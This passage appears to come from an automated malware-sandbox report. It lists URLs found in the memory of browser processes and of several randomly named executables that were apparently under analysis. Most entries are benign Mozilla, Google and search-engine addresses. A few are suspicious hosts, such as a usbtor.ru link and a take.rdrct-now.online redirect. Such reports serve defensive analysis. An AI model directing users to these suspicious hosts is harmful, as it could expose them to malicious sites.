                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
                          Source: firefox.exe, 00000018.00000002.2876308896.000001C7ACD26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/common
                          Source: firefox.exe, 00000018.00000002.2876308896.000001C7ACD61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/dates-and-times
                          Source: firefox.exe, 00000018.00000002.2876308896.000001C7ACD26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/math
                          Source: firefox.exe, 00000018.00000002.2876308896.000001C7ACD61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/regular-expressionsl
                          Source: firefox.exe, 00000018.00000002.2876308896.000001C7ACD26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/sets
                          Source: firefox.exe, 00000018.00000002.2811533571.000001C7A1603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/stringsX
                          Source: firefox.exe, 00000018.00000002.3613036647.000001C7B4AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3613036647.000001C7B4A89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3434753983.000001C7B344F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3220756752.000001C7B0CF0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3523724049.000001C7B3B0A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3282028922.000001C7B15EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3255714715.000001C7B1107000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3444229709.000001C7B3659000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3291788969.000001C7B1683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3291788969.000001C7B1603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                          Source: 6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: 6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: firefox.exe, 00000018.00000002.2982566429.000001C7AD37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
                          Source: bab5c1b6a6.exe, 00000027.00000000.2902757187.0000000000423000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                          Source: firefox.exe, 00000018.00000002.2982566429.000001C7AD37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
                          Source: 09be480dc7.exe, 00000024.00000003.4011728314.000000000596F000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.4078633256.0000000005690000.00000004.00000020.00020000.00000000.sdmp, 09be480dc7.exe, 00000024.00000003.4013401438.000000000596F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                          Source: firefox.exe, 00000018.00000002.2982566429.000001C7AD37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/c
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
                          Source: 4508a44a11.exe, 00000007.00000003.2353374719.0000000000735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                          Source: b6866cbf49.exe, 0000001B.00000002.3396642326.000000006BD2D000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: firefox.exe, 00000018.00000002.3291788969.000001C7B1683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE38F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD79E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul.popup-notification-description
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulbrowser.engagement.bookmarks_toolbar_bo
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD79E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/places/browser
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD79E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulconnectedCallback/this._mutationObserve
                          Source: firefox.exe, 00000018.00000002.3494799791.000001C7B39AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulp
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD743000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/RunSta
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD79E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/ContextualIdenti
                          Source: b6866cbf49.exe, 0000001B.00000002.3355742283.0000000005CBB000.00000004.00000020.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3384734245.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: 6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: 6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
                          Source: firefox.exe, 00000018.00000003.2586558743.000001C7B111F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3279856715.000001C7B1470000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2586899171.000001C7B115A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2579118375.000001C7B0F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2603431125.000001C7B108D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586763639.000001C7B113C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2587061509.000001C7B1177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/LOAD_ANONYMOUS_ALLOW_CLIENT_CERTUnknown
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: firefox.exe, 00000018.00000002.3710032406.000001C7B553D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                          Source: firefox.exe, 00000018.00000002.3710032406.000001C7B553D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.ca
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/settings/clients
                          Source: firefox.exe, 00000018.00000002.2819442098.000001C7A2EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 00000018.00000002.3157826140.000001C7AF688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B2506000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B2509000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1AEE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3396654277.000001C7B2621000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B250E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.accounts.firefox.com/v1
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
                          Source: firefox.exe, 00000018.00000002.2811533571.000001C7A1611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://blocked.cdn.mozilla.net/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037A1000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3561115822.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3279457717.000000000365C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876308896.000001C7ACDAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311AC7000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037A1000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3561115822.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3279457717.000000000365C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876308896.000001C7ACDAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311AC7000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                          Source: firefox.exe, 00000018.00000002.3434753983.000001C7B344F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD7AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Stale
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: chrome.exe, 0000000D.00000002.2526976907.00000203A2418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/repo
                          Source: chrome.exe, 0000000D.00000003.2518817502.000057D8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.2518855375.000057D8002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2586763639.000001C7B113C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2587061509.000001C7B1177000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://content.cdn.mozilla.net
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037A1000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3561115822.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3279457717.000000000365C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876308896.000001C7ACDAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311AC7000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                          Source: 4508a44a11.exe, 00000007.00000002.3493485997.00000000037A1000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3561115822.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3279457717.000000000365C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876308896.000001C7ACDAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311AC7000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E0F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://coverage.mozilla.org
                          Source: firefox.exe, 00000018.00000002.2811533571.000001C7A1611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://crash-stats.mozilla.org/report/index/
                          Source: firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://dap-02.api.divviup.org
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD62C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
